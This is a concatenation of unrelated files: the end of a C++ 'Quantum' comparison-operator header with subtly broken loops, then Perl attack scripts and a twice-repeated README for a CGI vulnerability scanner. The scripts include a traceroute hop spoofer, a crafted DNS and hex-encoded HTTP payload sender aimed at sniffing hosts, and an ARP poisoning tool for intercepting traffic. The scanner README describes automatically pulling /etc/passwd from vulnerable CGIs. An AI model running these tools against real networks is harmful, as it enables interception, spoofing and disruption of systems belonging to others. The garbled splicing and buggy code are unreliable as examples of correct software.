bool Quantum::operator==(Quantum x)
{
	register int i = 0, j = 0;

	// any()
	if (type == true)
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] == x.data[j])
						return true;
			return false;
		}

		// x.all()
		else
		{
			for (; i < data.size(); i++)
			{
				bool success = true;
				for (; j < x.data.size(); j++)
					if (data[i] != x.data[j])
						success = false;
				if (success == true)
					return true;
			}
			return false;
		}
	}

	// all()
	else
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
			{
				bool success = false;
				for (; j < x.data.size(); j++)
					if (data[i] == x.data[j])
						success = true;
				if (success == false)
					return false;
			}
			return true;
		}

		// x.all()
		else
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] != x.data[j])
						return false;
		return true;
	}

	return false;
}

bool Quantum::operator!=(Quantum x)
{
	register int i = 0, j = 0;

	// any()
	if (type == true)
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] != x.data[j])
						return true;
			return false;
		}

		// x.all()
		else
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] != x.data[j])
						return true;
			return false;
		}
	}

	// all()
	else
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
			{
				bool success = false;
				for (; j < x.data.size(); j++)
					if (data[i] != x.data[j])
						success = true;
				if (success == false)
					return false;
			}
			return true;
		}

		// x.all()
		else
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] == x.data[j])
						return false;
		return true;
	}

	return false;
}

bool Quantum::operator<=(Quantum x)
{
	register int i = 0, j = 0;

	// any()
	if (type == true)
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] <= x.data[j])
						return true;
			return false;
		}

		// x.all()
		else
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] <= x.data[j])
						return true;
			return false;
		}
	}

	// all()
	else
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
			{
				bool success = false;
				for (; j < x.data.size(); j++)
					if (data[i] <= x.data[j])
						success = true;
				if (success == false)
					return false;
			}
			return true;
		}

		// x.all()
		else
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] > x.data[j])
						return false;
		return true;
	}

	return false;
}

bool Quantum::operator>=(Quantum x)
{
	register int i = 0, j = 0;

	// any()
	if (type == true)
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] >= x.data[j])
						return true;
			return false;
		}

		// x.all()
		else
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] >= x.data[j])
						return true;
			return false;
		}
	}

	// all()
	else
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
			{
				bool success = false;
				for (; j < x.data.size(); j++)
					if (data[i] >= x.data[j])
						success = true;
				if (success == false)
					return false;
			}
			return true;
		}

		// x.all()
		else
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] < x.data[j])
						return false;
		return true;
	}

	return false;
}

bool Quantum::operator<(Quantum x)
{
	register int i = 0, j = 0;

	// any()
	if (type == true)
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] < x.data[j])
						return true;
			return false;
		}

		// x.all()
		else
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] < x.data[j])
						return true;
			return false;
		}
	}

	// all()
	else
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
			{
				bool success = false;
				for (; j < x.data.size(); j++)
					if (data[i] < x.data[j])
						success = true;
				if (success == false)
					return false;
			}
			return true;
		}

		// x.all()
		else
			for (; i < data.size(); i++)
				for (j = 0; j < x.data.size(); j++)
					if (data[i] >= x.data[j])
						return false;
		return true;
	}

	return false;
}

bool Quantum::operator>(Quantum x)
{
	register int i = 0, j = 0;

	// any()
	if (type == true)
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] > x.data[j])
						return true;
			return false;
		}

		// x.all()
		else
		{
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] > x.data[j])
						return true;
			return false;
		}
	}

	// all()
	else
	{
		// x.any()
		if (x.type == true)
		{
			for (; i < data.size(); i++)
			{
				bool success = false;
				for (; j < x.data.size(); j++)
					if (data[i] > x.data[j])
						success = true;
				if (success == false)
					return false;
			}
			return true;
		}

		// x.all()
		else
			for (; i < data.size(); i++)
				for (; j < x.data.size(); j++)
					if (data[i] <= x.data[j])
						return false;
		return true;
	}

	return false;
}

// END OF OVERLOADED OPERATORS (Quantum ? Quantum)

#endif QUANTUM_H_


#!/usr/bin/perl

# traceroute hop spoofer!
# -samy [cp5@LucidX.com]

use Packet::Inject;
use Packet::IP;
use Packet::Ethernet;
use Packet::ICMP;
use Packet::Definitions;
use Packet::Lookup;
use Packet::Sniff;

use strict;

die "usage: $0 <spoof 1> <spoof 2> ...\n" unless my @spoofs = @ARGV;

my $len = pack('I', 0);
my @mib = (
  &Packet::Definitions::CTL_NET,
  &Packet::Definitions::AF_ROUTE,
  0,
  &Packet::Definitions::AF_LINK,
  &Packet::Definitions::NET_RT_IFLIST,
  0
);
my $mib = pack('iiiiii', @mib);
syscall(&Packet::Definitions::SYS___sysctl, $mib, 6, 0, $len, 0, 0);
my $buf = pack('a' . unpack('I', $len), '');
syscall(&Packet::Definitions::SYS___sysctl, $mib, 6, $buf, $len, 0, 0);
my ($device) = ($buf =~ /.*?(\w{2,5}\d+)/);

# convert hosts to ip now to save time when sending packets
foreach (@spoofs) {
 $_ = quad2int(&Packet::Lookup::host_to_ip($_));
}


my $id       = int(rand(2 ** 16));
my $total    = @spoofs;
my $ethernet = Packet::Ethernet->new();
my $ip       = Packet::IP      ->new();
my $inject   = Packet::Inject  ->new(device => $device);
my $sniff    = Packet::Sniff   ->new(device => $device);
my $sendeth  = Packet::Ethernet->new(
  type       => 0x0800,
);


$inject->open() || die $inject->{errbuf};
$sniff ->open() || die $inject->{errbuf};
$sniff ->loop(0, \&parse, $total);


sub parse {
  my ($total, $hdr, $packet, $s) = @_;
  my ($sendip, $sendicmp);

  $ethernet->decode($packet);
  return unless $ethernet->type == 0x0800;

  $ip->decode($ethernet->data);
  return unless $ip->ttl <= ($total + 1);

  $sendeth->{dest_mac} = $ethernet->src_mac;

  # this is where we send the final packet and get device name
  if ($ip->ttl == $total + 1) {
    $sendicmp = Packet::ICMP->new(
      type          => &Packet::ICMP::ICMP_DEST_UNREACH,
      code          => &Packet::ICMP::ICMP_PORT_UNREACH,
      data          => "\0" x 4 . substr($ip->encode, 0, 28),
    );

    $sendip = Packet::IP->new(
      src_ip        => $ip->dest_ip,
      dest_ip       => $ip->src_ip,
      id            => $id++,
      proto         => 1,
      data          => $sendicmp,
    );

    $inject->write(packet => $sendeth . $sendip);

    print "Port Unreachable sent to " . int2quad($ip->src_ip) . "\n";
  }

  else {
    $sendicmp = Packet::ICMP->new(
      type => &Packet::ICMP::ICMP_TIME_EXCEED,
      code => &Packet::ICMP::ICMP_TTL_EXCEED,
      data => "\0" x 4 . substr($ip->encode, 0, 28),
    );
    $sendip = Packet::IP->new(
      src_ip        => $spoofs[$ip->ttl-1],
      dest_ip       => $ip->src_ip,
      id            => $id++,
      proto         => 1,
      data          => $sendicmp,
    );

    $inject->write(packet => $sendeth . $sendip);

    print "Time Exceeded In Transit sent to " . int2quad($ip->src_ip) .
          " from " . int2quad($spoofs[$ip->ttl-1]) . "\n";
  }

}


sub quad2int
{
    my $val = shift;
    my $counter = 3;
    my $i;
    my $result;

    for my $i (split/\./, $val) {
        $result += $i * 256 ** $counter--;
    }

    return ($result);
}

sub int2quad
{
    my $val = shift;
    my $result;

    if ($val =~ /^\d+$/) {
        $result = join('.', unpack("C4", pack('N', $val)));
    }

    return ($result);
}


#!/usr/bin/perl

use IO::Socket;

unless (@ARGV == 2) {
 die "usage: $0 <host to kill sniffs> <host with open port 80 [that host can sniff]>\n";
}

$tcpd1 = "eea600000001000000000000c00c00010001";
$urls1 =~ s/\s//g;
$urls2 = "GET / HTTP/1.0\nHost: do.not.enter.LucidX.com\n\n";

$sock = IO::Socket::INET->new(
	PeerAddr => "do.not.enter.LucidX.com",
	PeerPort => 80,
	Proto    => "tcp",
) or print STDERR "Can't open socket: $!\n";
print $sock $urls2;
close($sock);

$sock = IO::Socket::INET->new(
	PeerAddr => $ARGV[0],
	PeerPort => 53,
	Proto    => "udp",
) or print STDERR "Can't open socket: $!\n";
print $sock pack("H*", $tcpd1);
close($sock);

$sock = IO::Socket::INET->new(
	PeerAddr => $ARGV[1],
	PeerPort => 80,
	Proto    => "tcp",
) or print STDERR "Can't open socket: $!\n";
print $sock pack("H*", $urls1);
close($sock);

BEGIN {
 $urls1 = "
  52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f
  64 6f 6e 6f 74 67 6f 74 6f 2e 4c 75 63 69 64 58
  2e 63 6f 6d 0d 0a 0d 0a 00 00 00 00 8b 00 00 00
  00 00 00 00 53 05 00 00 ba 03 00 00 0e 05 00 00
  e5 04 00 00 19 01 00 00 24 03 00 00 00 00 00 00
  ce 04 00 00 d0 05 00 00 b8 04 00 00 65 04 00 00
  32 04 00 00 ca 05 00 00 0d 01 00 00 3b 06 00 00
  01 01 00 00 3a 06 00 00 a0 01 00 00 89 04 00 00
  00 00 00 00 8a 01 00 00 db 01 00 00 00 00 00 00
  d8 01 00 00 3d 03 00 00 4f 04 00 00 66 05 00 00
  00 00 00 00 2a 00 00 00 26 06 00 00 1d 05 00 00
  6b 02 00 00 d3 04 00 00 6b 05 00 00 fe 05 00 00
  93 05 00 00 d6 01 00 00 c7 02 00 00 5d 03 00 00
  95 04 00 00 00 00 00 00 50 00 00 00 56 03 00 00
  00 00 00 00 1e 01 00 00 fa 03 00 00 cc 01 00 00
  b7 00 00 00 d2 05 00 00 3c 03 00 00 00 00 00 00
  bf 04 00 00 00 00 00 00 00 00 00 00 8b 05 00 00
  c3 03 00 00 00 00 00 00 01 05 00 00 a6 05 00 00
  ae 05 00 00 00 00 00 00 9f 03 00 00 84 04 00 00
  0b 04 00 00 5a 02 00 00 d0 04 00 00 96 05 00 00
  1b 05 00 00 f0 02 00 00 11 06 00 00 72 00 00 00
  7a 01 00 00 22 02 00 00 00 00 00 00 c1 03 00 00
  fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  58 00 00 00 7f 00 00 00 00 00 00 00 cd 03 00 00
  c0 02 00 00 8e 03 00 00 08 05 00 00 26 00 00 00
  00 00 00 00 8f 04 00 00 00 00 00 00 a8 05 00 00
  42 05 00 00 3f 04 00 00 7f 03 00 00 a4 03 00 00
  12 04 00 00 d3 00 00 00 a3 03 00 00 45 06 00 00
  44 02 00 00 09 06 00 00 52 04 00 00 1b 06 00 00
  00 05 00 00 56 04 00 00 00 00 00 00 f2 02 00 00
  16 05 00 00 00 00 00 00 e9 05 00 00 7d 05 00 00
  33 05 00 00 c5 00 00 00 77 04 00 00 0b 02 00 00
  fc 04 00 00 e1 02 00 00 c3 04 00 00 06 06 00 00
  a1 03 00 00 e0 02 00 00 36 01 00 00 00 00 00 00
  72 01 00 00 b3 d8 04 28 ce fa 06 28 ce fa 06 28
  f3 03 00 00 62 d8 04 28 c8 b2 05 28 20 00 06 28
  00 00 00 00 00 00 00 00 e3 04 00 00 20 00 06 00
  7c fa bf bf 0f d8 04 28 ce fa 06 28 47 b7 a1 0a
  00 e1 05 28 00 00 00 00 c8 b2 05 28 e0 4b 0e 28
  ce fa 06 28 00 00 00 00 67 05 00 00 f8 00 00 00
  da 02 00 00 00 00 00 00 00 e1 05 28 00 00 00 00
  ec fa bf bf 4b d6 04 28 ce fa 06 28 47 b7 a1 0a
  e8 a1 05 28 dc fa bf bf b3 d8 04 28 1c 84 04 08
  93 d1 06 28 7e e8 04 28 62 d8 04 28 c8 b2 05 28
  20 00 06 28 00 00 00 00 c8 b2 05 28 80 b7 05 28
  20 00 06 01 00 fb bf bf 0f d8 04 28 1c 84 04 08
  04 cf 8a 06 00 e1 05 28 01 00 00 00 c8 b2 05 28
  00 e0 05 28 1c 84 04 08 02 00 00 00 02 00 00 00
  1c fb bf bf 65 c9 04 28 08 00 00 00 00 e1 05 28
  03 00 00 01 70 fb bf bf 4b d6 04 28 1c 84 04 08
  04 cf 8a 06 e8 a1 05 28 60 fb bf bf 01 00 00 00
  64 fb bf bf 6b c4 04 28 f0 a1 05 28 00 e0 05 28
  00 e1 05 28 ea c3 04 28 8e d5 04 28 c8 b2 05 28
  00 e0 05 28 1c 84 04 08 04 00 00 00 80 b7 05 28
  7c fb bf bf 01 69 07 28 00 e1 05 28 ec b3 06 28
  f8 fb bf 01 00 e1 05 28 28 fb bf bf 02 00 00 00
  02 00 00 00 d0 fb bf bf 36 c0 04 28 1c 84 04 08
  04 cf 8a 06 00 e0 05 28 cc fb bf bf 01 00 00 00
  00 e0 05 28 d0 fb bf bf 16 c0 04 28 1c 84 04 08
  00 00 00 00 a4 df 04 28 ea bf 04 28 c8 b2 05 28
  00 e0 05 28 78 9b 04 08 bd de 04 28 c8 b2 05 28
  00 e0 05 28 aa b8 04 28 30 83 04 08 c8 b2 05 01
  00 e1 05 28 00 fc bf bf 6e b9 04 28 00 20 06 28
  00 e0 05 28 fc fb bf bf 01 00 00 00 02 00 00 00 ";
}


#!/usr/bin/perl

# ARPredir.pl - by Samy Kamkar [CommPort5@LucidX.com]
# requires Packet (by Samy Kamkar and David Hulton)

# this will arp poisen a host (all hosts by default) on a local network
# and will allow you to sniff a specific host on your network without
# even enabling promiscuous mode on your ethernet device, and this will
# even work if the network is switched (that's the main purpose)

# offset is usually 78 or 80 for openbsd and 94 for freebsd

# usage: ./arpredir.pl [-t target] [-i device] offset host

use Packet::Device;			# module for getting local net interface and network info
use Packet::Lookups;			# module for converting values
use Packet::Inject;			# module for creating and sending packets
use Packet::Inject::ARP;		# module for creating an ARP header
use Packet::Inject::Ethernet;		# module for creating an ethernet header

$SIG{INT} = \&exit;			# when exiting go to &exit to fix the arp cache tables
my ($off, $host, $dev, $targ) = &begin;	# get arguements
unless ($targ) {			# target not specified
 $targ = "255.255.255.255";		# target will default to broadcast
 $arp{tpa} = "00000000";
}
else {
 $arp{tpa} = $targ;
}
unless ($dev) {				# no device specified
 $dev = if_dev();			# figure out main network device
}
$eth{src} = dev2mac($dev);		# always your local mac
$eth{dst} = ip2mac($off, $targ);	# always the target ip's mac [broadcast unless def'd with -t]
$arp{tha} = $eth{dst};			# always the target ip's mac [broadcast unless def'd with -t]
$arp{sha} = $eth{src};			# the mac that should receieve the data [at first, yours]
$arp{spa} = $host;			# the ip that should be assigned to your mac [def'd by <host>]
$arp{dmc} = ip2mac($off, $host);	# the original mac address of the ip
$pkt = new Packet::Inject(		# create a new packet object
 ETHERNET => {				# Ethernet header
  dest_mac => "ff:ff:ff:ff:ff:ff",	# dest mac
  src_mac => $eth{src},			# sourc mac
 },
 ARP => {				# ARP header
  opcode => 1,				# ARP who-has
  tha => "00:00:00:00:00:00",		# dest mac (repeated)
  sha => $arp{sha},			# source mac (repeated)
  spa => if_addr($dev),			# your real ip
  tpa => $arp{spa},			# the host's ip
 }
);
unless ($eth{dst}) {			# target wasn't in the arp cache table
 $pkt->send(1, $dev);			# send the packet once
}
unless ($arp{dmc}) {			# host wasn't in the arp cache table
 $pkt->send(1, $dev);			# send the packet once
}
if (!$eth{dst} or !$arp{dmc}) {		# one, or even both, of the macs weren't found
 $eth{dst} = ip2mac($off, $targ);	# retrieve proper mac
 $arp{dmc} = ip2mac($off, $host);	# get new host mac
 $arp{tha} = $eth{dst};			# reset the value to what it should be
}
$pkt->{ETHERNET}{dest_mac} = $eth{dst};	# change dest mac to new dest mac
$pkt->{ARP}{opcode} = 2;		# ARP is-at
$pkt->{ARP}{tha} = $arp{tha};		# dest mac (repeated)
$pkt->{ARP}{spa} = $arp{spa};		# the ip that our mac address is pretending to be
$pkt->{ARP}{tpa} = $arp{tpa};		# the ip that should get the arps

while (1) {				# infinite loop until SIGINT is called
 $pkt->send(1, $dev);			# send packet
 print "$arp{sha} $arp{tha} 0806 42: arp reply $arp{spa} is-at $arp{sha}\n";
 sleep 2;				# wait 2 seconds
}

sub exit {				# SIGINT has been called
 $SIG{INT} = sub { };			# make sure SIGINT doesn't do anything anymore
 $pkt->{ARP}{sha} = $arp{dmc};		# reroute the ip to the correct mac address
 foreach (1 .. 2) {			# loop twice for 2 packets
  $pkt->send(1, $dev);			# send packet
  print "$arp{dmc} $arp{tha} 0806 42: arp reply $arp{spa} is-at $arp{dmc}\n";
  sleep 1;				# wait a second
 }
 $pkt->send(1, $dev);			# send another (and last) packet and die
 die "$arp{dmc} $arp{tha} 0806 42: arp reply $arp{spa} is-at $arp{dmc}\n";
}

sub error {
 print "offsets:\n\topenbsd: 78 or 80\n\tfreebsd: 94\n\tlinux: unknown to the human race for all it's worth\n";
 die "usage: $0 [-t target] [-i device] offset host\n";	# incorrect arguements called
}

sub begin {
 if (@ARGV < 1 or @ARGV > 5) {
  &error;
 }
 my $host = pop(@ARGV);
 my $off = pop(@ARGV);
 my ($dev, $targ);
 for ($i = 0; $i < @ARGV; $i++) {
  if ($ARGV[$i] =~ /^[^-]/ and $ARGV[$i-1] =~ /^[^-]/) {
   &error;
  }
  if ($ARGV[$i] =~ /^-/) {
   if ($ARGV[$i] =~ /^-([a-z]+)$/i) {
    if ($1 eq 'i') {
     $dev = $ARGV[$i+1];
    }
    elsif ($1 eq 't') {
     $targ = $ARGV[$i+1];
    }
   }
   else {
    &error;
   }
  }
 }
 return($off, $host, $dev, $targ);
}


screamingCobra - automated remote CGI vulnerability discovery


Welcome to cobra.LucidX.com! screamingCobra is an application that does automated vulnerability scanning in remote CGIs by using techniques that are able to spot very common bugs in many CGIs, usually when dealing with templates or any other files or applications. screamingCobra was written by Samy Kamkar, originally at Caezar's Challenge V at DefCon, but rewritten completely with numerous feature additions (previously known as crawl5b). Check the manual page for more information!
________________________________________


News - January 12th, 2002


This site is put up and I've set up a mailing list to go with it. Submit your email address at the bottom left to subscribe to the mailing list or send an email to majordomo@LucidX.com with the body containing 'subscribe cobra'.
________________________________________


screamingCobra's Manual


A read-me on how to use screamingCobra, what it does, all of its options, etc..


Download screamingCobra


You can get all the downloads from here such as the stable version, development version, and even specific files out of a certain version. For the stable version, get CURRENT.tar.gz.


Changes


You can see all the changes made with all of the versions of screamingCobra here, including changes in the development version!
http://www.samy.pl/scobra/

Index of /scobra/downloads/screamingCobra-1.04
 	Name
Last modified
Size
Description

________________________________________
 	Parent Directory
 	-
 	LICENSE
13-Jan-2002 05:23	1.4K
 	README
13-Jan-2002 05:39	7.6K
 	TODO
13-Jan-2002 05:23	163
 	changeLog
13-Jan-2002 05:23	632
 	sCobra-WIN.exe
13-Jan-2002 05:23	784K
 	screamingCobra.pl
22-Jan-2002 23:44	9.9K
________________________________________
screamingCobra v1.04 -- < January 12, 2002 >
by Samy Kamkar [commport5@LucidX.com]

usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]

=======================
== TABLE OF CONTENTS ==
=======================
1. What is screamingCobra
2. What screamingCobra does
3. Why was screamingCobra written
4. Configuring screamingCobra
  A. Basic Configuration
  B. Adding Techniques
5. Command-line options
6. Supported Operating Systems
=======================


   _____________________________
1. __ WHAT IS SCREAMING COBRA __
   =============================
Any CGI that doesn't check arguements that are passed to it
over the web are possibly vulnerable to attacks which allow
a malicious user get read access to almost any file on that
system, if not access to execute programs.  screamingCobra
is almost always able to find those bugs REMOTELY due to
the common errors programmers make.

screamingCobra is an application for remote vulnerability
discovery in ANY UNKNOWN web applications such as CGIs and PHP
pages.  Simply put, it attemps to find vulernabilities in all
web applications on a host without knowing anything about the
applications.  Modern CGI scanners scan a host for CGIs
with known vulnerabilities.  screamingCobra is able to 'find'
the actual vulnerabilities in ANY CGI, whether it has been
discovered before or not.


   _______________________________
2. __ WHAT SCREAMING COBRA DOES __
   ===============================
I've even been told by administrators of very well known
sites that they've been able to use screamingCobra (originally
called crawl5b, before this release) and find at least one
bug which allows anyone to get read access to almost any file
on the system, if not access to execute applications.  When
you launch screamingCobra, it crawls the specified host
over the web and attempts to find all the CGIs or any other
applications where parameters can be passed.  It then attempts
to use a few techniques to read files on that machine.  By
default, it attempts to read /etc/passwd, and if successful it
will display the URL in which it used to access the file.


   _____________________________________
3. __ WHY WAS SCREAMING COBRA WRITTEN __
   =====================================
The core was originally written at DefCon 9, specifically at
Caezar's Challeng V, for Challenge B:
"identify hypothetical cases of common bugs in server-side
programs and then to describe algorithms that could detect those
problems from a special version of the client software".
I did just that, and wrote a program to go along with it.

Caezar's Challenge: http://caezarschallenge.org

   _________________________________
4. __ CONFIGURING SCREAMING COBRA __
   =================================
  A. -- BASIC CONFIGURATION --
   There's not much, if any, configuring to be done.
   Although, there may be some things you want to change.
   I'll go over those now.  Open up screamingCobra.pl
   in a text editor and check these lines out:

   Line 29: this is the file it will attempt to access
    change 'etc/passwd' to, say, 'bin/ls' to attempt
    to read /bin/ls.
    I recommend KEEPING /etc/passwd as the default.

   Line 30: this is the additional technique for finding
    vulnerabilities.  Leave it alone if you don't know
    what it's doing :)

   Line 32: @first -- this is the HTML tags to look for
    that contain URLs.  The array, by default, includes
    'a' (for <a href's..), 'img' (<img src...), 'body',
    'area', 'frame' and 'meta'.  You may add more, just
    follow the defaults.

   Line 36: @second -- this is the tag options to look
    for inside of a tag, such as 'href' (for <a href..)
    and 'src' (<img src...).
    This will NOT just look at the 2nd word in the tag,
    but any words following a whitespace so it WILL
    catch something like <a blah="" href="...">.

   Line 40: @ignore -- extensions of files to not do a
    GET on, just because they usually don't contain HTML
    and are a waste of bandwidth.

   Line 45: @requests -- this is the basic header that's
    sent to the server when requesting a page or CGI.
    screamingCobra randomly chooses one for each GET it
    does, add more according to the two default ones.

   That's it!  You probably didn't have to change anything
   or add anything, but it's good to know how to.


  B. -- ADDING TECHNIQUES --
   Adding techniques and using them is very simple!
   First, find where the '$technique1' variable is set (by
   default, it's at line 29).  After all the variables in
   that section that begin with 'technique' and end in a
   number, add a new one, incrementing the number by 1.
   For example, if you have a fresh screamingCobra.pl,
   you would stick in:
$technique3 = "your technique to be GET'd";
   The 3 is because there are already two other techniques.

   Now to actually be able to use the 3rd technique (and
   all techniques ending with a number less than 3 [2, 1]),
   you must add that many '-e's when running screamingCobra.

   For example, if you wanted to run screamingCobra using
   technique 3, you would run like so:
./screamingCobra.pl -eee http://host.name

   You may of course use any other arguements, as well, and
   use whatever host/port/page you want to.


   __________________________
5. __ COMMAND-LINE OPTIONS __
   ==========================
usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]

-e: EXTRA TECHNIQUES
    Uses multiple techniques to find bugs.
    This will take over twice the amount of time to
    complete a scan and the other techniques used with
    this options are not commonly found in applications
    but if you need to do a very strong pen test, you
    may want to use this option.

-i: DON'T IGNORE ANY FILES
    In the program, there is a user-configurable array
    of extensions to ignore (not to GET).  Those include
    images, compressed files, etc..  This is because those
    files will usually not be HTML pages so there won't
    be any useful data in them, and they may take up a lot
    of bandwidth as well.  This option ignores that list
    and screamingCobra will not ignore any files.

-s: STATUS BAR
    This creates a status bar with constantly updated
    numbers of pages accessed, bugs found and attempted
    vulnerability scans.  Cannot be used with verbose,
    although the status bar is ALWAYS displayed when the
    user unexpectedly exits or kills the application (^C)
    or when the application is finished crawling.

-v: VERBOSE
    This will display all the files being accessed and
    will also list when CGIs are found and attempted to
    be broken (to find vulnerabilities).  Cannot be used
    with status bar, although a status bar is ALWAYS
    displayed when the user unexpectedly exits or kills the
    application (^C) or when the application is finished
    crawling.

<http://host.name>: Hostname or IP of host to scan. [REQUIRED]
    For example, http://cobra.LucidX.com

[:port]: Port to connect to, default is 80.
    For example, http://cobra.LucidX.com:80

[/start/page]: Page to start on.
    For example, http://cobra.LucidX.com/screamingCobra-1.03/
    and also,    http://cobra.LucidX.com:80/index.html


   __________________________________
6. __ SUPPORTED OPERATING SYSTEMS  __
   ==================================
screamingCobra will work on ANY operating system that has
Perl 5.x.

I also compiled a binary for
Windows, sCobra-WIN.exe.

This will be recompiled for every new version of
screamingCobra and will be included in all releases.


===================
== END OF README ==
===================
That's all for now.
Contact me (Samy Kamkar) at commport5@LucidX.com for
questions or comments, hope to hear from you all! :)

http://samy.pl/scobra/downloads/screamingCobra-1.04/


Index of /scobra/downloads/CURRENT
 	Name
Last modified
Size
Description

________________________________________
 	Parent Directory
 	-
 	LICENSE
13-Jan-2002 05:23	1.4K
 	README
13-Jan-2002 05:39	7.6K
 	TODO
13-Jan-2002 05:23	163
 	changeLog
13-Jan-2002 05:23	632
 	sCobra-WIN.exe
13-Jan-2002 05:23	784K
 	screamingCobra.pl
22-Jan-2002 23:44	9.9K
________________________________________
screamingCobra v1.04 -- < January 12, 2002 >
by Samy Kamkar [commport5@LucidX.com]

usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]

=======================
== TABLE OF CONTENTS ==
=======================
1. What is screamingCobra
2. What screamingCobra does
3. Why was screamingCobra written
4. Configuring screamingCobra
  A. Basic Configuration
  B. Adding Techniques
5. Command-line options
6. Supported Operating Systems
=======================


   _____________________________
1. __ WHAT IS SCREAMING COBRA __
   =============================
Any CGI that doesn't check arguements that are passed to it
over the web are possibly vulnerable to attacks which allow
a malicious user get read access to almost any file on that
system, if not access to execute programs.  screamingCobra
is almost always able to find those bugs REMOTELY due to
the common errors programmers make.

screamingCobra is an application for remote vulnerability
discovery in ANY UNKNOWN web applications such as CGIs and PHP
pages.  Simply put, it attemps to find vulernabilities in all
web applications on a host without knowing anything about the
applications.  Modern CGI scanners scan a host for CGIs
with known vulnerabilities.  screamingCobra is able to 'find'
the actual vulnerabilities in ANY CGI, whether it has been
discovered before or not.


   _______________________________
2. __ WHAT SCREAMING COBRA DOES __
   ===============================
I've even been told by administrators of very well known
sites that they've been able to use screamingCobra (originally
called crawl5b, before this release) and find at least one
bug which allows anyone to get read access to almost any file
on the system, if not access to execute applications.  When
you launch screamingCobra, it crawls the specified host
over the web and attempts to find all the CGIs or any other
applications where parameters can be passed.  It then attempts
to use a few techniques to read files on that machine.  By
default, it attempts to read /etc/passwd, and if successful it
will display the URL in which it used to access the file.


   _____________________________________
3. __ WHY WAS SCREAMING COBRA WRITTEN __
   =====================================
The core was originally written at DefCon 9, specifically at
Caezar's Challeng V, for Challenge B:
"identify hypothetical cases of common bugs in server-side
programs and then to describe algorithms that could detect those
problems from a special version of the client software".
I did just that, and wrote a program to go along with it.

Caezar's Challenge: http://caezarschallenge.org

   _________________________________
4. __ CONFIGURING SCREAMING COBRA __
   =================================
  A. -- BASIC CONFIGURATION --
   There's not much, if any, configuring to be done.
   Although, there may be some things you want to change.
   I'll go over those now.  Open up screamingCobra.pl
   in a text editor and check these lines out:

   Line 29: this is the file it will attempt to access
    change 'etc/passwd' to, say, 'bin/ls' to attempt
    to read /bin/ls.
    I recommend KEEPING /etc/passwd as the default.

   Line 30: this is the additional technique for finding
    vulnerabilities.  Leave it alone if you don't know
    what it's doing :)

   Line 32: @first -- this is the HTML tags to look for
    that contain URLs.  The array, by default, includes
    'a' (for <a href's..), 'img' (<img src...), 'body',
    'area', 'frame' and 'meta'.  You may add more, just
    follow the defaults.

   Line 36: @second -- this is the tag options to look
    for inside of a tag, such as 'href' (for <a href..)
    and 'src' (<img src...).
    This will NOT just look at the 2nd word in the tag,
    but any words following a whitespace so it WILL
    catch something like <a blah="" href="...">.

   Line 40: @ignore -- extensions of files to not do a
    GET on, just because they usually don't contain HTML
    and are a waste of bandwidth.

   Line 45: @requests -- this is the basic header that's
    sent to the server when requesting a page or CGI.
    screamingCobra randomly chooses one for each GET it
    does, add more according to the two default ones.

   That's it!  You probably didn't have to change anything
   or add anything, but it's good to know how to.


  B. -- ADDING TECHNIQUES --
   Adding techniques and using them is very simple!
   First, find where the '$technique1' variable is set (by
   default, it's at line 29).  After all the variables in
   that section that begin with 'technique' and end in a
   number, add a new one, incrementing the number by 1.
   For example, if you have a fresh screamingCobra.pl,
   you would stick in:
$technique3 = "your technique to be GET'd";
   The 3 is because there are already two other techniques.

   Now to actually be able to use the 3rd technique (and
   all techniques ending with a number less than 3 [2, 1]),
   you must add that many '-e's when running screamingCobra.

   For example, if you wanted to run screamingCobra using
   technique 3, you would run like so:
./screamingCobra.pl -eee http://host.name

   You may of course use any other arguements, as well, and
   use whatever host/port/page you want to.


   __________________________
5. __ COMMAND-LINE OPTIONS __
   ==========================
usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]

-e: EXTRA TECHNIQUES
    Uses multiple techniques to find bugs.
    This will take over twice the amount of time to
    complete a scan and the other techniques used with
    this options are not commonly found in applications
    but if you need to do a very strong pen test, you
    may want to use this option.

-i: DON'T IGNORE ANY FILES
    In the program, there is a user-configurable array
    of extensions to ignore (not to GET).  Those include
    images, compressed files, etc..  This is because those
    files will usually not be HTML pages so there won't
    be any useful data in them, and they may take up a lot
    of bandwidth as well.  This option ignores that list
    and screamingCobra will not ignore any files.

-s: STATUS BAR
    This creates a status bar with constantly updated
    numbers of pages accessed, bugs found and attempted
    vulnerability scans.  Cannot be used with verbose,
    although the status bar is ALWAYS displayed when the
    user unexpectedly exits or kills the application (^C)
    or when the application is finished crawling.

